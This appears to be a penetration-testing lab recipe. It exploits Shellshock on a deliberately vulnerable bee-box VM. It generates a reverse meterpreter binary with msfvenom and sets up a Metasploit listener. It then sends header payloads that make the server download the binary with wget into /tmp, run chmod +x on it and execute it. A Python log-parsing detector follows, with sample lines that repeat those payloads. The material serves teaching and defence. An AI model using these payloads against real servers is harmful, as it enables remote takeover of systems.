How to do it...

For this exercise, have both the Kali and bee-box virtual machines running, then follow the next steps:

  1. First, we use msfvenom to generate our reverse meterpreter shell, setting it up to connect back to the Kali machine's IP address. Open a terminal in Kali and issue the following command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4443 -f elf > cute_dolphin.bin

This will create a file named cute_dolphin.bin, which is a reverse Linux meterpreter shell; reverse means that it connects back to the attacking machine instead of listening for us to connect to it.

  2. Next, we need to set up a listener for the connection our cute dolphin is going to create. Open a msfconsole terminal and, once it loads, issue the following commands:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.56.10
set lport 4443
run

As you can see, the payload, lhost, and lport are the ones we used to create the .bin file. They are the IP address and TCP port the program is going to connect to, so we need to listen on that network interface of our Kali Linux and on that port. The final exploit configuration should look as follows:

  3. Now that Kali is ready, it's time to prepare the attack on the victim. Start the Apache service as root by running the following command:
service apache2 start
  4. Then, copy the malicious file to the web server folder:
cp cute_dolphin.bin /var/www/html/
  5. Now we proceed to the exploitation. We know bee-box is vulnerable to Shellshock and will use it to make the server download the malicious file. Exploit Shellshock on the server with the following payload:
() { :;}; echo "Vulnerable:" $(/bin/sh -c "/usr/bin/wget http://192.168.56.10/cute_dolphin.bin -O /tmp/cute_dolphin.bin;chmod +x /tmp/cute_dolphin.bin; ls -l /tmp/cute_dolphin.bin")

The last two parts of the payload set the execution permission on the downloaded file (chmod +x /tmp/cute_dolphin.bin) and confirm that the file was downloaded (ls -l /tmp/cute_dolphin.bin). As the following screenshot shows, a successful exploitation returns the filename and its properties:

  6. With the file on the server, we exploit Shellshock again to execute it: () { :;}; echo "Vulnerable:" $(/tmp/cute_dolphin.bin)
  7. If everything goes right, we should see a connection being received in our Metasploit listener, as illustrated as follows:

  8. Once the session is established, we can use the help command to see the functionality of meterpreter and start running commands on the compromised server:
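The two Shellshock requests in steps 5 and 6 travel as ordinary HTTP headers, which means the target's own web server logs them. Apache's combined log format records the Referer and User-Agent headers, the ones most commonly used to carry the payload, so a defender can find this attack after the fact, or alert on it, by parsing those two fields. The following Python script is an added detection example, not part of this recipe or of bee-box: it parses a few constructed combined-format lines (the CGI path /cgi-bin/example.cgi, the timestamps and the client addresses are placeholders; the header values mirror the payloads used above), flags any Referer or User-Agent that carries the function-definition trigger, and classifies the injected command as staging a download, executing from a temporary directory, or other.

```python
import re
from typing import Dict, List

# Apache "combined" log format. Quoted fields may contain backslash-escaped
# quotes, which is how Apache writes a '"' that appears inside a header value.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)

# A Shellshock trigger is a bash function definition "() { ... }" at the start
# of a header value, followed by the command bash executes after parsing it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)')

# Constructed sample lines (not real traffic). The CGI path is a placeholder;
# the two payloads mirror the download-and-chmod and the execute requests
# from this recipe, as Apache would write them (inner quotes escaped).
SAMPLE_LOG: List[str] = [
    r'192.168.56.1 - - [10/Oct/2023:13:55:30 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    r'192.168.56.10 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo \"Vulnerable:\" $(/bin/sh -c \"/usr/bin/wget http://192.168.56.10/cute_dolphin.bin -O /tmp/cute_dolphin.bin;chmod +x /tmp/cute_dolphin.bin\")"',
    r'192.168.56.10 - - [10/Oct/2023:13:55:41 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 98 "() { :;}; echo \"Vulnerable:\" $(/tmp/cute_dolphin.bin)" "curl/7.88.1"',
]


def classify(cmd: str) -> str:
    """Label the injected command by what it does to the host.

    'stage'    - fetches a file with wget/curl and makes it executable
    'exec-tmp' - runs something out of a world-writable directory
    'other'    - anything else (still an attack, just less telling)
    """
    if re.search(r'\b(?:wget|curl)\b', cmd) and 'chmod +x' in cmd:
        return 'stage'
    if re.search(r'(?:^|[\s($;])/(?:tmp|dev/shm)/\S+', cmd):
        return 'exec-tmp'
    return 'other'


def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line whose Referer or User-Agent carries a
    Shellshock trigger, with the injected command and its classification."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; leave it for another parser
        for field in ('referer', 'ua'):
            s = SHELLSHOCK_RE.search(m.group(field))
            if s:
                cmd = s.group('cmd')
                hits.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'request': m.group('req'),
                    'field': field,
                    'command': cmd,
                    'kind': classify(cmd),
                })
    return hits


if __name__ == '__main__':
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['kind']:8} via {hit['field']}: {hit['command']}")
```

The trigger pattern is the signal, not the command after it, so any "() {" at the start of a header value deserves an alert even when the trailing command looks harmless. Combined format captures only two headers; a payload placed in Cookie, Host or a custom header never reaches this log, so either extend the LogFormat with the extra headers you care about (for example %{Cookie}i) or inspect requests at a WAF in front of the CGI scripts. The root fix remains a patched bash on the server, which no longer executes what follows the function definition.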
